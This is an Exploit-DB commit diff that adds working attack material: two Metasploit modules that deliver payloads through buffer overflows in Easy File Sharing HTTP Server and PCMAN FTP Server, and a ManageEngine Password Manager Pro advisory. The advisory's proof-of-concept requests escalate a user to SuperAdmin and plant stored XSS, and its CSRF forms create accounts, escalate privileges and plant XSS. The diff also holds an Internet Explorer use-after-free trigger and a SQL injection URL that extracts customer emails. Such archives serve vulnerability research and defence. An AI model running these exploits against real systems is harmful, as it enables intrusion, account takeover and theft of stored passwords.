DB: 2016-04-06

5 new exploits

Easy File Sharing HTTP Server 7.2 SEH Overflow
PCMAN FTP Server Buffer Overflow - PUT Command
Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)
ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities
Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)

files.csv

@@ -15218,6 +15218,8 @@ id,file,description,date,author,platform,type,port
 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0
 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0
 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0
+39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,metasploit,windows,remote,80
+39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,metasploit,windows,remote,21
 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0
 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0
 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0
@@ -35883,3 +35885,6 @@ id,file,description,date,author,platform,type,port
 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
+39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
+39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
+39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0

platforms/jsp/webapps/39664.txt

@@ -0,0 +1,388 @@
+[Systems Affected]
+   Product : ManageEngine Password Manager Pro
+   Company : ZOHO Corp.
+   Build Number : 8.1 to 8.3 and probably earlier versions
+   Affected Versions : 8102 to 8302 and probably earlier versions
+
+
+[Product Description]
+   Password Manager Pro is a secure vault for storing and managing
+shared sensitive information such as passwords, documents and digital
+identities of enterprises.
+
+
+[Vulnerabilities]
+   Multiple vulnerabilities were identified within this application:
+   1- Stored XSS in /AddMail.ve
+   2- Privilege escalation in /EditUser.do
+   3- Business Login Bypass in /EditUser.do
+   4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
+   5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
+   6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
+   7- Password Bruteforce for resources accounts in
+/jsp/xmlhttp/AjaxResponse.jsp
+   8- Cross-Site Request Forgery
+
+
+[Advisory Timeline]
+   17/07/2015 - Discovery and vendor notification
+   17/07/2015 - ManageEngine responsed that they will notify their
+development team
+   13/10/2015 - ManageEngine informed that they have fixed these issue
+   14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
+   15/10/2015 - Test on Beta build version 8300 was performed and
+confirm the fix of these issues 2, 4, 7 and part of issue 8
+   02/11/2015 - ManageEngine ask more time to fix the remaining issues
+before making this public
+   29/12/2015 - ManageEngine contacted for an update - No reply
+   12/01/2016 - ManageEngine contacted for an update - No reply
+   08/02/2016 - ManageEngine contacted for an update - small update provided
+   12/02/2016 - Last communication from ManageEngine
+   04/04/2016 - Public Disclosure
+
+
+[Patch Available]
+   Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
+fix issues #2, #4, #7 and partially #8
+   Password Manager Pro Release 8.3 (8303) (Released on December 2015)
+fix issues #1, #3, #5 and #6
+
+
+[Exploit]
+   There is an exploit available that takes advantage of the Privilege
+Escalation vulnerability (Issue #2) and elevates a regular user to
+SuperAdmin, and then downloads the passwords and files stored within
+the application. The exploit code is available here
+   - https://github.com/s3bap3/pmp-exploit
+
+
+[Description of Vulnerabilities]
+
+(1) Stored XSS in /AddMail.ve.
+   This functionality is under the personal accounts stored in the
+application. However, as the page is also vulnerable to CSRF, an html
+form can be forged to create a personal account an exploit the XSS
+vulnerability. The affected parameter is "password", and the POST
+message to send is something like this
+
+   [PoC]
+      POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
+
+      service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
+
+
+(2) Privilege escalation in /EditUser.do that allows to do 2 things.
+   a- Hijack user's sessions by changing their emails and accessing
+the forgot password functionality.
+   The affected parameter is "EMAIL" from the /EditUser.do web page.
+Any user (even PASSWORD USER's role) could send a craft POST method
+like the one below in order to change the user email address, which is
+being used to generate a new user password when the previous one was
+forgotten. The only attribute that needs to be changed from one
+request to another is the LOGINID, which is a sequence number that
+represent the User numeric ID.
+
+   b- Escalate privileges by changing the user account status from
+Password user to superadmin.
+   By forging a similar request it is possible to raise our own
+privileged to become a privileged user. For example, the parameter
+"ROLE" can be changed to "Password Auditor" "Password Administrator"
+or even "Administrator " and become it. It is also possible to become
+a superAdmin by changing the parameter "superAdmin" from false to
+true. This will allow us to take control of the application and all
+the passwords stored on it. In order to become superAdmin, the user
+role needs to be Administrator. Both can be achieved by forging the
+same request. In this scenario there are two parameters to be aware
+of.
+   - USERID and LOGINID is the numeric account id to which the
+superadmin attribute will be granted (could be obtained from the login
+reply)
+   - USER is the username to which the superadmin attribute will be granted
+
+   [PoC]
+      POST /EditUser.do?SUBREQUEST=true HTTP/1.1
+      Content-Type: multipart/form-data;
+boundary=---------------------------20780287114832
+
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="isloginusersa"
+
+      false
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="superadminscope"
+
+      true
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="SERVERPORT"
+
+      7272
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="OLDROLE"
+
+      Administrator
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="USERID"
+
+      4
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="LOGINID"
+
+      4
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="USER"
+
+      username
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="OLDLANG"
+
+      en
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="EMAIL"
+
+      pwned@user.com
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="ROLE"
+
+      Administrator
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="superAdmin"
+
+      true
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="Rule"
+
+      Strong
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="DEPT"
+
+
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="LOCATION"
+
+
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="mobileaccess"
+
+      enable
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="UserCert"; filename=""
+      Content-Type: application/octet-stream
+
+
+      -----------------------------20780287114832
+      Content-Disposition: form-data; name="lang_code"
+
+      en
+      -----------------------------20780287114832--
+
+
+(3) Business Login Bypass in /EditUser.do
+   The application allows only the creation of certain amount of
+Administrator, based on the licences. However it is possible to create
+more administrators. In order to exploit this go to the user
+administration page, and edit a user id. Save the edition without
+making any modification and intercept that POST message. Modify both
+parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
+the user role will be changed to this one. Every user can be converted
+to an administrator even if the license does not allow that much. The
+application only check the amount of administrators when "ROLE" is
+Administrator but "OLDROLE" is another one.
+
+
+(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
+   Every time a password for a user account or resource's user account
+is being changed, a request is sent to this path in order to validate
+the password against the password policy. Despite the fact the the
+password is being sent in the URL (this means it could be logged in
+any proxy or even in the browser), the policy against the password is
+being evaluated could by changed by modifying the parameter "Rule"
+from the value it currently has to "Low", in order to be evaluated
+with a lower policy. For example:
+
+   [PoC]
+      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
+      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
+
+
+(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
+   When an administrator creates a Password Reset Listener, another
+administrator needs to approve it. The same happens when a Listener
+needs to be suspended. However this could be bypassed by creating and
+approving the listener by the same administrator. This could be
+achieved by forging a GET request like the following. The only
+parameter that needs to be changed is the "LISTENERID" which is a
+sequence number that represents the Listener.
+
+   [PoC]
+      Listener Approval
+      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
+
+      Listener Suspension
+      https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
+
+
+(6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
+   It is possible to enumerate resource's user accounts by forging a
+GET request as follows. This URL allows, if a user has access, to
+retrieve the account password. However if a user does not have access,
+the error message changes if the user exists or not. The only
+parameters that needs to be modified are "Resource" and "Account".
+
+   [PoC]
+      https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
+
+      The error messages identifies if the account exists for that resource.
+      Account exists: ____ACCESS___DENIED__
+      Resource/Account does not exists: FAILURE
+
+
+(7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
+   It is possible to enumerate resource's user passwords by forging a
+GET request as follows. This URL is used in order to validate a user
+password against the password policy specified. By being able to
+change the password policy it is possible to use the "Low" policy
+which does not allow to reuse the password that is currently setup for
+the user. If an error message that the password could not be reused
+appears, that indicate that the password is the current password for
+that account.
+   The only parameters that needs to be modified are "Password" and
+"ACCID", and ensure that the password policy "Rule" parameter is set
+to low.
+
+   [PoC]
+      https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
+
+      The error messages identifies if the password is correct or not
+for every user account.
+      Password matches: "Password cannot be same as last 1 passwords"
+      Password does not match: "SUCCESS"
+      Account ID does not exists: "Error in validating password policy"
+
+
+(8) Cross-Site Request Forgery
+   The application is vulnerable to Cross-Site Request Forgery, which
+by sending specific POST messages it is possible create a user in the
+system (1), elevate privileges for a user (2)(4), and store a XSS in
+the user's personal passwords (3). Below are two PoC
+
+   [PoC]
+      User Creation
+      <html>
+         <body>
+            <form method="post"
+action="https://192.168.0.3:7272/AddUser.do"
+enctype="multipart/form-data">
+               <input value="true" name="superadminscope"
+type="hidden"><input value="true" type="hidden">
+               <input value="true" name="isloginusersa"
+type="hidden"><input value="true" type="hidden">
+               <input value="hacker" name="fname" type="hidden"><input
+value="true" type="hidden">
+               <input value="hacker" name="lname" type="hidden"><input
+value="true" type="hidden">
+               <input value="hacker" name="user" type="hidden"><input
+value="true" type="hidden">
+               <input value="same" name="rbutton" type="hidden"><input
+value="true" type="hidden">
+               <input value="Strong" name="Rule" type="hidden"><input
+value="true" type="hidden">
+               <input value="" name="spassword" type="hidden"><input
+value="true" type="hidden">
+               <input value="hacker@hacker.com" name="mail"
+type="hidden"><input value="true" type="hidden">
+               <input value="Password User" name="ROLE"
+type="hidden"><input value="true" type="hidden">
+               <input value="false" name="superAdmin"
+type="hidden"><input value="true" type="hidden">
+               <input value="" name="dept" type="hidden"><input
+value="true" type="hidden">
+               <input value="false" name="location"
+type="hidden"><input value="true" type="hidden">
+               <input value="enable" name="mobileaccess"
+type="hidden"><input value="true" type="hidden">
+               <input value="en" name="lang_code" type="hidden"><input
+value="true" type="hidden">
+               <input type="submit" value="Submit">
+            </form>
+         </body>
+      </html>
+
+      Privilege Escalation
+      <html>
+         <body>
+            <form method="post"
+action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
+enctype="multipart/form-data">
+               <input value="true" name="isloginusersa"
+type="hidden"><input value="true" type="hidden">
+               <input value="true" name="superadminscope"
+type="hidden"><input value="true" type="hidden">
+               <input value="Administrator" name="OLDROLE"
+type="hidden"><input value="true" type="hidden">
+               <input value="613" name="USERID" type="hidden"><input
+value="true" type="hidden">
+               <input value="613" name="LOGINID" type="hidden"><input
+value="true" type="hidden">
+               <input value="hacker" name="USER" type="hidden"><input
+value="true" type="hidden">
+               <input value="en" name="OLDLANG" type="hidden"><input
+value="true" type="hidden">
+               <input value="hacker@hacker.com" name="EMAIL"
+type="hidden"><input value="true" type="hidden">
+               <input value="Administrator" name="ROLE"
+type="hidden"><input value="true" type="hidden">
+               <input value="true" name="superAdmin"
+type="hidden"><input value="true" type="hidden">
+               <input value="Strong" name="Rule" type="hidden"><input
+value="true" type="hidden">
+               <input value="" name="DEPT" type="hidden"><input
+value="true" type="hidden">
+               <input value="" name="LOCATION" type="hidden"><input
+value="true" type="hidden">
+               <input value="enable" name="mobileaccess"
+type="hidden"><input value="true" type="hidden">
+               <input value="en" name="lang_code" type="hidden"><input
+value="true" type="hidden">
+               <input type="submit" value="Submit">
+            </form>
+         </body>
+      </html>
+
+      Stored XSS
+      <html>
+         <body>
+            <form name="badform" method="post"
+action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
+accept-charset="UTF-8">
+               <input type="hidden" name="service" value="1" />
+               <input type="hidden" name="serviceurl" value="1" />
+               <input type="hidden" name="loginname" value="1" />
+               <input type="hidden" name="password" value="<!-- --
+--><script>alert('XSS');</script><!-- -- -->" />
+               <input type="hidden" name="spassword" value="" />
+               <input type="hidden" name="tags" value="" />
+               <input type="hidden" name="Rule" value="Low" />
+               <input type="submit" value="Submit">
+            </form>
+         </body>
+      </html>
+
+      Privilege Escalation
+      <html>
+         <body>
+            <form name="badform" method="post"
+action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
+accept-charset="UTF-8">
+               <input type="hidden" name="SKIP_PREF" value="true" />
+               <input type="hidden" name="Admin" value="hacker" />
+               <input type="hidden" name="FORWARDURL"
+value="UserTabView.cc%3F" />
+               <input type="submit" value="Submit">
+            </form>
+         </body>
+      </html>
+
+--
+S3ba
+@s3bap3
+http://linkedin.com/in/s3bap3

platforms/php/webapps/17327.txt

@@ -13,15 +13,15 @@
 ------------------------------------------------------------------------
 vulnerable url:
 
-/templates1/view_product.php?product=3D
+/templates1/view_product.php?product=
 
 Example:
 
-http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]
+http://localhost/templates1/view_product.php?product=[SQL INJECTION]
 
 Get an Mail from the Customers Table:
 
-http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=
+http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=
 ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
 2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
 CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=

platforms/windows/dos/39663.html

@@ -0,0 +1,42 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691
+
+Minimized PoC:
+-->
+
+<svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
+<pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern>
+<script><![CDATA[
+  function handler() {
+    inner.setAttribute("viewBox");
+  }
+  outer.addEventListener("DOMAttrModified", function () { handler(); });
+  doc = document.implementation.createDocument("", "", null);
+  doc.adoptNode(rect.attributes[0]);
+]]></script>
+</svg>
+
+<!--
+Backtrace for reference:
+
+2:052:x86> k 10
+ChildEBP RetAddr
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571
+0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748
+0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74
+0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c
+0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d
+0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15
+0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41
+0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12
+0bb14d4c 60dca53f vfbasics+0x13246
+0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46
+0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10
+0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRe
+ct>+0xb6
+0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110
+0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996
+0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe
+0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee
+-->

platforms/windows/local/39666.txt

@@ -0,0 +1,11 @@
+Sources:
+https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
+https://github.com/sam-b/CVE-2014-4113
+
+EDB Mirror: https://www.exploit-db.com/docs/39665.pdf
+
+
+Trigger and exploit code for CVE-2014-4113:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip
+

platforms/windows/remote/39661.rb

@@ -0,0 +1,70 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
+      'Description'    => %q{
+        This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
+      },
+      'Author'         => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '39008' ],
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'    => 390,
+          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
+          'StackAdjustment' => -3500,
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
+        ],
+      'DefaultOptions' => {
+          'RPORT' => 80
+        },
+      'DisclosureDate' => 'Dec 2 2015',
+      'DefaultTarget'  => 0))
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def exploit
+    connect
+    print_status("Sending exploit...")
+    sploit = "GET "
+    sploit << rand_text_alpha_upper(4061)
+    sploit << generate_seh_record(target.ret)
+    sploit << make_nops(19)
+    sploit << payload.encoded
+    sploit << make_nops(7)
+    sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
+    sploit << " HTTP/1.0\r\n\r\n"
+    sock.put(sploit)
+    print_good("Exploit Sent")
+    handler
+    disconnect
+  end
+end

platforms/windows/remote/39662.rb

@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server Buffer Overflow - PUT Command',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the PUT command of the
+          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+          credientials are enabled.
+      },
+      'Author'         =>
+          [
+            'Jay Turla',      # Initial Discovery -- @shipcod3
+            'Chris Higgins'   # msf Module -- @ch1gg1ns
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB',   '37731'],
+          [ 'OSVDB',   '94624']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\x0A\x0D",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
+              'Offset' => 2007
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Aug 07 2015',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    connect_login
+    disconnect
+
+    if /220 PCMan's FTP Server 2\.0/ === banner
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    connect_login
+
+    print_status('Generating payload...')
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(16)
+    sploit << payload.encoded
+
+    send_cmd( ["PUT", sploit], false )
+    disconnect
+  end
+
+end